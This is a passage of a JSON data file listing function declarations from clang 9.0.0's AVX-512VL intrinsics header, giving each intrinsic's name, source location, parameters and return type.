}, { "tag": "function", "name": "_mm256_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2771:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2779:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_getexp_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2786:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2794:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2801:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2808:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_max_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2815:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2822:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2829:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2836:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_max_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2843:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2850:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2857:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2864:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_min_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2871:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2878:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2885:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2892:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_min_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2899:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2906:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2913:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2920:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_mul_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2927:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2934:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2941:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2948:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_mul_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2955:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2962:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2969:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2976:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_abs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2983:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2990:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:2995:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3002:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3009:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3014:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_abs_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3021:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3028:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3035:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3042:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3049:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3056:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3061:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3068:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3075:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3080:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3087:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3094:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3101:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3115:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3122:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3127:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3134:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3141:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3146:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_max_epu64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3153:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_maskz_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3167:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_maskz_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3181:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3188:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3193:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3212:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_min_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:3219:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": 